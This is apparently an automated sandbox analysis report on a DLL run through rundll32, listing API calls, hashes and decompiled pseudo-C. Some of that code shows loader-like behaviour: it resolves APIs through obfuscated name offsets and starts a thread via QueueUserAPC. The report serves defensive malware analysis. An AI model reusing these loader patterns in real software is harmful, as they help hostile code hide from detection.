    • Opcode Fuzzy Hash: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID:
    • API String ID: 4069495278-0
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe$nTm
    • API String ID: 0-2966304076
    • Opcode ID: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
    • Opcode Fuzzy Hash: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: e43d083280e43b433ce692929a99faa4154703f70f5ffae0b4360ba276a52797
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: e43d083280e43b433ce692929a99faa4154703f70f5ffae0b4360ba276a52797
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 3211817929-0
    • Opcode ID: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction ID: 207e8859d230f5c46583432988c0e9f64fcb3a1dd6f5ca4dcf2b2a3037d2bf3d
    • Opcode Fuzzy Hash: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction Fuzzy Hash: F66191B19042299BDF0DCFA5D440BBEBBB8EF5A304F03545AE601A7A90FB749904CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _v8;
    				_Unknown_base(*)()* _t29;
    				_Unknown_base(*)()* _t33;
    				_Unknown_base(*)()* _t36;
    				_Unknown_base(*)()* _t39;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t46;
    				struct HINSTANCE__* _t50;
    				intOrPtr _t56;
    
    				_t56 = E6D501C8F(0x20);
    				if(_t56 == 0) {
    					_v8 = 8;
    				} else {
    					_t50 = GetModuleHandleA( *0x6d5041d0 + 0x6d505014);
    					_v8 = 0x7f;
    					_t29 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050e1);
    					 *(_t56 + 0xc) = _t29;
    					if(_t29 == 0) {
    						L8:
    						E6D50136A(_t56);
    					} else {
    						_t33 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050f1);
    						 *(_t56 + 0x10) = _t33;
    						if(_t33 == 0) {
    							goto L8;
    						} else {
    							_t36 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505104);
    							 *(_t56 + 0x14) = _t36;
    							if(_t36 == 0) {
    								goto L8;
    							} else {
    								_t39 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505119);
    								 *(_t56 + 0x18) = _t39;
    								if(_t39 == 0) {
    									goto L8;
    								} else {
    									_t42 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d50512f);
    									 *(_t56 + 0x1c) = _t42;
    									if(_t42 == 0) {
    										goto L8;
    									} else {
    										 *((intOrPtr*)(_t56 + 8)) = _a8;
    										 *((intOrPtr*)(_t56 + 4)) = _a4;
    										_t46 = E6D5018D1(_t56, _a12);
    										_v8 = _t46;
    										if(_t46 != 0) {
    											goto L8;
    										} else {
    											 *_a16 = _t56;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
      • Part of subcall function 6D501C8F: HeapAlloc.KERNEL32(00000000,?,6D50117D,?,00000000,00000000,?,?,?,6D501810), ref: 6D501C9B
    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D501272,?,?,?,?,00000002,00000000,?,?), ref: 6D501AC9
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501AEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B01
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B17
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B2D
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B43
      • Part of subcall function 6D5018D1: memset.NTDLL ref: 6D501950
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocHandleHeapModulememset
    • String ID:
    • API String ID: 426539879-0
    • Opcode ID: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction ID: 06c090254e768ffffda4703e05b9072da51824ba3b85085fdd979d50398ed559
    • Opcode Fuzzy Hash: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction Fuzzy Hash: 612141B150060A9FDB14EF69C980E6B77FCFF59288B018429F915C7A11E730E911CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
    				long _v8;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				char _t9;
    				void* _t10;
    				void* _t18;
    				void* _t23;
    				void* _t36;
    
    				_push(__ecx);
    				_t9 = _a8;
    				_v8 = 1;
    				if(_t9 == 0) {
    					_t10 = InterlockedDecrement(0x6d504188);
    					__eflags = _t10;
    					if(_t10 == 0) {
    						__eflags =  *0x6d50418c;
    						if( *0x6d50418c != 0) {
    							_t36 = 0x2328;
    							while(1) {
    								SleepEx(0x64, 1);
    								__eflags =  *0x6d504198;
    								if( *0x6d504198 == 0) {
    									break;
    								}
    								_t36 = _t36 - 0x64;
    								__eflags = _t36;
    								if(_t36 > 0) {
    									continue;
    								}
    								break;
    							}
    							CloseHandle( *0x6d50418c);
    						}
    						HeapDestroy( *0x6d504190);
    					}
    				} else {
    					if(_t9 == 1 && InterlockedIncrement(0x6d504188) == 1) {
    						_t18 = HeapCreate(0, 0x400000, 0);
    						_t41 = _t18;
    						 *0x6d504190 = _t18;
    						if(_t18 == 0) {
    							L6:
    							_v8 = 0;
    						} else {
    							 *0x6d5041b0 = _a4;
    							asm("lock xadd [eax], edi");
    							_push( &_a8);
    							_t23 = E6D501CA4(E6D501D32, E6D501EE0(_a12, 1, 0x6d504198, _t41));
    							 *0x6d50418c = _t23;
    							if(_t23 == 0) {
    								asm("lock xadd [esi], eax");
    								goto L6;
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • InterlockedIncrement.KERNEL32(6D504188), ref: 6D501E26
    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6D501E3B
      • Part of subcall function 6D501CA4: CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
      • Part of subcall function 6D501CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
      • Part of subcall function 6D501CA4: GetLastError.KERNEL32(00000000), ref: 6D501CDB
      • Part of subcall function 6D501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
      • Part of subcall function 6D501CA4: CloseHandle.KERNEL32(00000000), ref: 6D501CEC
      • Part of subcall function 6D501CA4: SetLastError.KERNEL32(00000000), ref: 6D501CF5
    • InterlockedDecrement.KERNEL32(6D504188), ref: 6D501E8E
    • SleepEx.KERNEL32(00000064,00000001), ref: 6D501EA8
    • CloseHandle.KERNEL32 ref: 6D501EC4
    • HeapDestroy.KERNEL32 ref: 6D501ED0
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
    • String ID:
    • API String ID: 2110400756-0
    • Opcode ID: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction ID: e47518073d8cf81db53b54104f1926deca42c706051f8a3e86ea37be545f352f
    • Opcode Fuzzy Hash: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction Fuzzy Hash: EF215171A01206EBDF049FA9CC84F6E7FB8FB6A3A9752452DE605D3940E7308D008B61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EBD4
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D501CA4(long _a4, DWORD* _a12) {
    				_Unknown_base(*)()* _v0;
    				long _t11;
    				void* _t13;
    
    				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6d5041cc, 0, _a12);
    				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
    					_t11 = GetLastError();
    					TerminateThread(_t13, _t11);
    					CloseHandle(_t13);
    					_t13 = 0;
    					SetLastError(_t11);
    				}
    				return _t13;
    			}

    APIs
    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
    • GetLastError.KERNEL32(00000000), ref: 6D501CDB
    • TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
    • CloseHandle.KERNEL32(00000000), ref: 6D501CEC
    • SetLastError.KERNEL32(00000000), ref: 6D501CF5
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
    • String ID:
    • API String ID: 3832013932-0
    • Opcode ID: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction ID: e8a26b5971025458e82b0f11c085cb150f8dde0193a0cb37bfc48d88cf124303
    • Opcode Fuzzy Hash: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction Fuzzy Hash: 0CF01C36606622BBEF125BA08C1CF5BBF79FB0A752F02880DFA0991950D72188119BA5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,?,00000000,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(6D5694B8,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000,?,?), ref: 6D529C4C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$|@Wm
    • API String ID: 3880921956-4016660527
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction ID: d06f77792ee8f0ddd8581fb2f5d9e3da557fbdd9d909316860f9029486c7d242
    • Opcode Fuzzy Hash: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction Fuzzy Hash: 11510371A44305AFDB19CF69C841B7A77F4FF88324F118969E919DBA60E770DA00CB82
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction ID: 35cc19189a2f0fc8b008971ae3c199cd004566ee5b58b77260024d7b70d8c769
    • Opcode Fuzzy Hash: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction Fuzzy Hash: FBF0EC315046699BCB18DB58E4C9E3673E9AA86714762CC16F165D7D10CF20F9814A92
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction ID: a149f0fe58e4c2dfae35c050c13240cf5a38d9f4efe91a3d641bacf0499868ba
    • Opcode Fuzzy Hash: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction Fuzzy Hash: 4541877190020AEFCF0ACFA5DC80AEEBBB6FF48344F158498FA05A7690D3359A54DB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    • Opcode ID: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction ID: 65002f9509fbad7b982c144353000c565b5793898702aadffe886003448096e7
    • Opcode Fuzzy Hash: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction Fuzzy Hash: E51190311042069FD70CEF65C405BAAB7B8EF80319F164899D9618BAA1DB74FD44CB92
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,?,?,6D528974,?,6D571A64), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 182364050-3612616537
    • Opcode ID: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction ID: 821b17d38d87001d10ad88e0c54a7a50f43c3187920555c8d0b2ac57b33860c0
    • Opcode Fuzzy Hash: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction Fuzzy Hash: FE014B78D0810CBBCF08FBF4DC55CED777DAB50100F914420EB2092999EB74AA1D8AE1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction ID: 28a116ae2d610d7241b0095b3a87153722b14fbd7b8edaf7050acac51c309f4a
    • Opcode Fuzzy Hash: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction Fuzzy Hash: ADB158329082869FDB09DF68C8807FEBBF5EF95344F15C5AAD8409BA41D7348D02CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    • Opcode ID: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction ID: 587d2070596cf407629af46028d83733f3b256ece8c05a4906e21d4246238f51
    • Opcode Fuzzy Hash: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction Fuzzy Hash: 89818C71C05B6A9FDF19CF98D490BEEBBB4FB0A314F06845AD514ABA40E770D944CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
